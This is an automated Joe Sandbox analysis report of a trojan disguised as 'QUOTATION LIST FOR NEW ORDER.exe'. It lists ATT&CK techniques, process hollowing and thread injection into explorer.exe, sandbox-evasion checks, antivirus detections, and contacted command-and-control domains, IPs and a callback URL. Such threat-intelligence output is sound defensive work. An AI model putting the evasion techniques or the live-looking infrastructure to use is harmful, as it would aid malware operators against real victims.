          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information5Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 458798 Sample: QUOTATION LIST FOR NEW ORDER.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 5 other signatures 2->43 10 QUOTATION LIST FOR NEW ORDER.exe 3 2->10         started        process3 file4 29 C:\...\QUOTATION LIST FOR NEW ORDER.exe.log, ASCII 10->29 dropped 13 QUOTATION LIST FOR NEW ORDER.exe 10->13         started        16 QUOTATION LIST FOR NEW ORDER.exe 10->16         started        process5 signatures6 53 Modifies the context of a thread in another process (thread injection) 13->53 55 Maps a DLL or memory area into another process 13->55 57 Sample uses process hollowing technique 13->57 59 Queues an APC in another process (thread injection) 13->59 18 explorer.exe 13->18 injected process7 dnsIp8 31 www.quotovate.com 47.222.2.124, 80 SUDDENLINK-COMMUNICATIONSUS United States 18->31 33 everesttechsolutions.com 204.11.58.233, 49704, 80 PUBLIC-DOMAIN-REGISTRYUS United States 18->33 35 2 other IPs or domains 18->35 45 System process connects to network (likely due to code injection or exploit) 18->45 22 cmmon32.exe 18->22         started        signatures9 process10 signatures11 47 Modifies the context of a thread in another process (thread injection) 22->47 49 Maps a DLL or memory area into another process 22->49 51 Tries to detect virtualization through RDTSC time measurements 22->51 25 cmd.exe 1 22->25         started        process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTATION LIST FOR NEW ORDER.exe61%VirustotalBrowse
          QUOTATION LIST FOR NEW ORDER.exe46%MetadefenderBrowse
          QUOTATION LIST FOR NEW ORDER.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          QUOTATION LIST FOR NEW ORDER.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.QUOTATION LIST FOR NEW ORDER.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comd30%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.carterandcone.comh-s0%Avira URL Cloudsafe
          http://www.fontbureau.comd:0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comessed0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/:0%Avira URL Cloudsafe
          http://www.fontbureau.comldF0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/:0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
          http://www.fontbureau.comW.TTFk0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.com90%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/(0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.de0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.fontbureau.como80%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.fontbureau.comalsd0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Y0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Z0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.agfamonotype.0%URL Reputationsafe
          http://www.tiro.comslnt0%URL Reputationsafe
          http://www.fontbureau.comcomd0%URL Reputationsafe
          http://www.carterandcone.comTC0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htmO;0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/N0%URL Reputationsafe
          http://www.fontbureau.comY0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
          http://www.carterandcone.com-sQE1s/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/xS0%Avira URL Cloudsafe
          http://www.fontbureau.comto0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          www.appackersandmoversbengaluru.com/p4se/0%Avira URL Cloudsafe
          http://www.fontbureau.comessed30%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
          http://www.everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
          http://www.fontbureau.comcomF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/(0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.fontbureau.como0%URL Reputationsafe
          http://www.fontbureau.comals0%URL Reputationsafe
          http://www.urwpp.dej0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/(0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.quotovate.com
          		47.222.2.124
          		truetrue
            		unknown
            everesttechsolutions.com
            		204.11.58.233
            		truetrue
              		unknown
              www.tomio.tech
              		unknown
              		unknowntrue
                		unknown
                www.everesttechsolutions.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  www.appackersandmoversbengaluru.com/p4se/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.everesttechsolutions.com/p4se/?RFQLn6=2dFdaDmhFhA0QZgP&-Zmt_=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVk1syv4zArANdeJ+Lg==true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.fontbureau.com/designersGexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.comd3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fontbureau.com/designers/?explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                        		high
                        http://www.carterandcone.comh-sQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.comd:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designersGNQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comessedQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersZQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252531304.00000000059F1000.00000004.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247644835.00000000059F0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/jp/:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comldFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comW.TTFkQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersbQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255121412.00000000059F1000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com9QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fonts.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.urwpp.deQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255135599.00000000059FA000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.como8QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252567447.00000000059D2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.sakkal.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com.TTFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers6MQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253053283.00000000059F1000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comalsdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/YQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.335006943.0000000006870000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.jiyu-kobo.co.jp/ZQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.galapagosdesign.com/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.257287203.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.agfamonotype.QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261422144.00000000059F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.tiro.comslntQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248396955.00000000059F2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comcomdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253506597.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comTCQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmO;QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.258690188.00000000059C8000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/NQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comYQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252917416.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/GQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.com-sQE1s/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.247860642.00000000059F1000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/xSQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.249682670.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.comtoQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/jp/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comaQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252701033.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comdQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253137868.00000000059D2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comessed3QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253917297.00000000059D2000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253893243.00000000059CC000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/sQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/rQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250297719.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comcomFQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254519056.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/jp/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.250650789.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.248847065.00000000059D2000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comoQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.261741820.00000000059D2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.341133083.000000000BE70000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comalsQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255438854.00000000059D2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.dejQUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.255181502.00000000059FA000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers:QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.253270152.00000000059F1000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.254053171.00000000059F1000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers/QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252461683.00000000059D2000.00000004.00000001.sdmp, QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.252430930.00000000059F1000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/(QUOTATION LIST FOR NEW ORDER.exe, 00000000.00000003.256992965.00000000059D2000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      204.11.58.233
                                                      		everesttechsolutions.comUnited States
                                                      		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                      47.222.2.124
                                                      		www.quotovate.comUnited States
                                                      		19108SUDDENLINK-COMMUNICATIONSUStrue

                                                      General Information

                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                      Analysis ID:458798
                                                      Start date:03.08.2021
                                                      Start time:18:53:26
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:QUOTATION LIST FOR NEW ORDER.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@9/1@5/2
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 58.7% (good quality ratio 52%)
                                                      • Quality average: 69.8%
                                                      • Quality standard deviation: 33.1%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 23.211.4.86
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, blobcollector.events.data.trafficmanager.net, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolcus15.cloudapp.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      18:54:49API Interceptor1x Sleep call for process: QUOTATION LIST FOR NEW ORDER.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      204.11.58.233Invoice #210722 14,890 $.exeGet hashmaliciousBrowse
                                                      • www.everesttechsolutions.com/p4se/?Xl=8ptXsvhhshn&j8kTd=aCSsC2Wtvj0xQ8J4lkVrtXAo/y9YES1uuye3QtaBHWEeyHJ7dSrXHfQKVnZFxvELJI1b

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      PUBLIC-DOMAIN-REGISTRYUSMJLkaPZomUolseU.exeGet hashmaliciousBrowse
                                                      • 208.91.199.225
                                                      SecuriteInfo.com.Trojan.MSIL.Kryptik.56a80396.11710.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      Invoice.exeGet hashmaliciousBrowse
                                                      • 208.91.198.143
                                                      Scan#0068-46c3367.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      Scan#0068-46c3366.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      bin.exeGet hashmaliciousBrowse
                                                      • 119.18.54.122
                                                      IMG-20210802-WA0587-085.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      IMG-20210802-WA0587-087.exeGet hashmaliciousBrowse
                                                      • 208.91.198.143
                                                      Quotation.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      QUOTE 04202021.exeGet hashmaliciousBrowse
                                                      • 103.21.58.16
                                                      PURCHASE ORDER PO09377 _093640_9307355_264378_88479_0E974.exeGet hashmaliciousBrowse
                                                      • 208.91.199.225
                                                      order.PDF.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      RFQ #7696679TTR6F.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      Waybill Doc_027942941.exeGet hashmaliciousBrowse
                                                      • 208.91.199.225
                                                      Confirmaci#U00f3n de pago .exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                      • 162.222.226.11
                                                      oBNvb4c6bg.exeGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      TVz86np48Z.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      Current Vendor Payment Application .docGet hashmaliciousBrowse
                                                      • 208.91.199.224
                                                      XiAn Sunnstatement 27-07-2021 pdf.exeGet hashmaliciousBrowse
                                                      • 208.91.199.223
                                                      SUDDENLINK-COMMUNICATIONSUSAEOjFHGJArGet hashmaliciousBrowse
                                                      • 74.224.157.19
                                                      uMWZeUs5ZUGet hashmaliciousBrowse
                                                      • 47.214.175.5
                                                      LnjgWbwSinGet hashmaliciousBrowse
                                                      • 47.208.203.76
                                                      8Z9DxqJIfNGet hashmaliciousBrowse
                                                      • 74.193.211.111
                                                      vw23PmQlqGGet hashmaliciousBrowse
                                                      • 173.217.185.2
                                                      psqZnqCtZLGet hashmaliciousBrowse
                                                      • 74.225.176.64
                                                      SecuriteInfo.com.Linux.Mirai.27.23761.13200Get hashmaliciousBrowse
                                                      • 74.225.189.162
                                                      Lv08gOEYJ3Get hashmaliciousBrowse
                                                      • 47.208.116.165
                                                      oqG1fmow77Get hashmaliciousBrowse
                                                      • 173.80.22.233
                                                      4dIxGwjniIGet hashmaliciousBrowse
                                                      • 75.108.75.218
                                                      i01hLg63evGet hashmaliciousBrowse
                                                      • 47.215.216.37
                                                      DLGXmh48NDGet hashmaliciousBrowse
                                                      • 74.242.201.236
                                                      Lkm548STLfGet hashmaliciousBrowse
                                                      • 75.108.170.66
                                                      6sag2zM690Get hashmaliciousBrowse
                                                      • 173.216.231.112
                                                      MJ5yMxtK4YGet hashmaliciousBrowse
                                                      • 192.101.60.106
                                                      EM7kj9300xGet hashmaliciousBrowse
